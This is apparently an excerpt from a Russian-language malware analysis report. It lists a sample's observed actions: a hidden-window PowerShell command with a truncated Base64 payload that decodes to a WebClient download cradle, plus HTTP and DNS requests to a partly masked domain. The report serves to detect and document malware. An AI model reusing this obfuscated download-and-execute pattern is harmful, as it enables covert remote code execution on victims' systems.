Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gaft = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'Ozt0cnl7JGE9KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly9hd2ViLnRoZXNob3Rib2Fy...
- http://aw##.##eshotboard.info/?pa####################
- DNS ASK aw##.##eshotboard.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gaft = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'Ozt0cnl7JGE9KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly9hd2ViLnRoZXNob3Rib2Fy...' (со скрытым окном)